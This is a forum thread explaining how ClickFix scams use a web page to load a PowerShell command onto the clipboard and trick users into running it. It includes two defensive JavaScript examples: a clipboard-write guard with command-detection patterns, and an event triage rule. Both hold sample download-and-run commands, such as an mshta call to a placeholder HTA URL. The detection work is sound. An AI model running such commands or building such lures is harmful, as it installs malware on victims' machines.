Clickfix malware: how can the miscreants load up the clipboard?

I understand the latest malware scam is called Clickfix and tricks people into running malware. It does this by loading a script into the clipboard and tricking people into running it. How does it load the script into the clipboard?

I expect Google and Microsoft to fix this PDQ.
 
Maybe newer versions of it do,
but I thought it literally does what the name suggests:
pops up an error message
with "click to fix this".
Clicking it copies it to the clipboard.

Or by putting up a fake captcha:
clicking "verify I am human" copies it to the clipboard.
 
This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

 
Not quite sure what the excitement is over this is, it's malware 101 isn't it? Trick the user into doing something.

Even if the command is copied to your clipboard, you still need to run it manually. You could change the browser clipboard permission default so that action is required by the user before a web site can access it, but guess what. If the user is being tricked into doing this in the first place, they'll be tricked into clicking OK on that prompt first too.

If you want to do that for your own peace of mind, set the policy on your browser to prompt you or set it so that only a pre-determined list of URLs can access it:

 
Not quite sure what the excitement is over this is, it's malware 101 isn't it? Trick the user into doing something.

This thread is about loading stuff into the computer's clipboard. How does the malware do it (explained above) and how is it allowed to do it in the first place.
 
This thread is about loading stuff into the computer's clipboard. How does the malware do it (explained above) and how is it allowed to do it in the first place.
It can do it because accessing the clipboard is a standard web API call: https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API

It's trivial to have a button on a web page which copies text into your clipboard. It's not so easy to convince the user to then paste that into the right place where it can then be executed and do some harm.
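To make the point above concrete from the defender's side, here is an added example (not code from the thread or from any of the articles quoted in it) of how little it takes to write to the clipboard through `navigator.clipboard.writeText`, and how a user script or browser extension could wrap that call to flag or block writes that look like a command meant for the Run box or a terminal. The marker list, the `installClipboardGuard` name and the fake `navigator` stand-in are all constructed for this illustration.

```javascript
// Added example, not from the thread: a defensive wrapper around the Clipboard API.
// A single writeText() call is all a page needs to fill the clipboard; the guard below
// inspects each write and reports (or rejects) text that looks like a shell command.

// Constructed heuristic markers for command-like text. Illustrative, not a signature set.
const COMMAND_MARKERS = [
  /\bpowershell(\.exe)?\b/i,
  /\bmshta(\.exe)?\b/i,
  /\bcmd(\.exe)?\s*\/c\b/i,
  /\b(iwr|irm|iex|Invoke-WebRequest|Invoke-Expression)\b/i,
  /https?:\/\/\S+\.(hta|ps1|exe|bat)\b/i,
];

// Return the source of every marker the text matches (empty array for benign text).
function commandIndicators(text) {
  if (typeof text !== "string") return [];
  return COMMAND_MARKERS.filter((re) => re.test(text)).map((re) => re.source);
}

function looksLikeShellCommand(text) {
  return commandIndicators(text).length > 0;
}

// Wrap nav.clipboard.writeText. Suspicious writes are passed to onSuspicious and,
// when block is true, rejected so the text never reaches the clipboard.
// nav is a parameter (rather than the global navigator) so this runs outside a browser.
function installClipboardGuard(nav, { block = true, onSuspicious = () => {} } = {}) {
  const clipboard = nav.clipboard;
  if (!clipboard || typeof clipboard.writeText !== "function") {
    throw new Error("navigator.clipboard.writeText is not available");
  }
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = async function guardedWriteText(text) {
    const hits = commandIndicators(text);
    if (hits.length > 0) {
      onSuspicious({ text, hits });
      if (block) throw new Error("clipboard write blocked: text looks like a shell command");
    }
    return original(text);
  };
  return original; // handed back so a caller can restore the unwrapped function
}

// Constructed stand-in for navigator so the guard can be exercised in Node.
// In a real page you would call installClipboardGuard(window.navigator, ...).
function makeFakeNavigator() {
  const store = { value: "" };
  return {
    store,
    clipboard: {
      async writeText(t) { store.value = t; },
      async readText() { return store.value; },
    },
  };
}

// A benign copy goes through; a command-looking copy (constructed sample, placeholder
// URL) is reported and blocked, leaving the earlier benign text on the clipboard.
async function demo() {
  const nav = makeFakeNavigator();
  const flagged = [];
  installClipboardGuard(nav, { onSuspicious: (e) => flagged.push(e) });
  await nav.clipboard.writeText("order #12345");
  let blocked = false;
  try {
    await nav.clipboard.writeText('powershell -c "mshta http://example.invalid/fix.hta"');
  } catch (e) {
    blocked = true;
  }
  return { clipboard: nav.store.value, blocked, flaggedCount: flagged.length };
}

demo().then((r) => console.log(JSON.stringify(r)));
```

Note that a guard like this only sees writes that go through the wrapped function; a page can also copy via `document.execCommand('copy')`, so a real extension would hook that path too. The heuristic is deliberately loose and is there to illustrate the check, not to be relied on as the only control.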
 
It's trivial to have a button on a web page which copies text into your clipboard. It's not so easy to convince the user to then paste that into the right place where it can then be executed and do some harm.
I could be wrong but I think what @Quartz is asking is how it runs the code once it's been copied to the clipboard.
 
Right. I can understand the web page having read access but not write access. The browser itself will need write access.
You mean like when you copy & paste something from a website?

e: Honestly I'm struggling to see what's so special about Clickfix; from what I can tell it's your basic social engineering type of attack. Try to make someone think something bad has happened to get them to do something they shouldn't, like download and run a program or, in this case, run a snippet of code.
 
Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.
The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard)

You'd need to be a bit clueless to do any of this. "Paste this code into your system and run it. Trust me bro."
I'm sure it will catch a good amount of today's web users.
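The Windows+R then CTRL+V sequence quoted above leaves a recognisable trace on the endpoint: the Run dialog is hosted by explorer.exe, so whatever gets pasted and run starts as a child of explorer.exe. The following is an added example (not from the thread or the quoted article) of triaging process-creation events for exactly that ancestry combined with a download-and-HTA style command line. The event field names (`parent_image`, `image`, `command_line`) and the sample events are constructed for the illustration; map them onto your own Sysmon or EDR schema.

```javascript
// Added example, not from the thread: flag interpreters started from the Run dialog
// whose command line carries the download/HTA traits the thread describes.

// The Run dialog (Win+R) lives in explorer.exe, so a pasted command appears as its child.
const RUN_DIALOG_HOST = "explorer.exe";
const INTERPRETERS = new Set(["powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"]);

// Last path component, lower-cased, so "C:\Windows\explorer.exe" compares as "explorer.exe".
function baseName(path) {
  return path.split(/[\\\/]/).pop().toLowerCase();
}

// Return a human-readable reason when the event matches the pattern, otherwise null.
function classifyEvent(ev) {
  const parent = baseName(ev.parent_image || "");
  const image = baseName(ev.image || "");
  const cmd = ev.command_line || "";
  if (parent !== RUN_DIALOG_HOST || !INTERPRETERS.has(image)) return null;
  const reasons = [];
  if (/https?:\/\//i.test(cmd)) reasons.push("remote URL in command line");
  if (/\.hta\b/i.test(cmd) || image === "mshta.exe") reasons.push("HTA execution");
  if (/-(w|windowstyle)\s+hidden/i.test(cmd)) reasons.push("hidden window");
  if (/-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}/i.test(cmd)) reasons.push("encoded command");
  // An admin simply opening a console from Run produces no reasons and is not flagged.
  return reasons.length ? `${image} launched from Run dialog: ${reasons.join(", ")}` : null;
}

// Run every event through the classifier and keep only the hits.
function triage(events) {
  return events
    .map((ev) => ({ ev, reason: classifyEvent(ev) }))
    .filter((r) => r.reason !== null);
}

// Constructed sample telemetry (not real events). URL is a placeholder.
const SAMPLE_EVENTS = [
  {
    ts: "2024-01-01T10:00:00Z", user: "alice",
    parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    command_line: 'powershell -w hidden -c "mshta http://example.invalid/fix.hta"',
  },
  {
    ts: "2024-01-01T10:05:00Z", user: "bob",
    parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    command_line: "powershell", // plain console opened from Run: benign
  },
  {
    ts: "2024-01-01T10:06:00Z", user: "carol",
    parent_image: "C:\\Program Files\\Browser\\browser.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    command_line: 'powershell -c "iwr http://example.invalid/x"', // different ancestry, other rule
  },
  {
    ts: "2024-01-01T10:07:00Z", user: "dave",
    parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\notepad.exe",
    command_line: "notepad",
  },
];

for (const hit of triage(SAMPLE_EVENTS)) {
  console.log(`${hit.ev.ts} ${hit.ev.user}: ${hit.reason}`);
}
```

The rule is intentionally narrow: it only fires on the explorer.exe to interpreter ancestry that the Run dialog produces, and only when the command line also carries a network or HTA trait, so a user who legitimately opens a console from Run is left alone. The third sample event (an interpreter spawned by a browser) is real-world suspicious but belongs to a different detection, which is why it is not matched here.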
 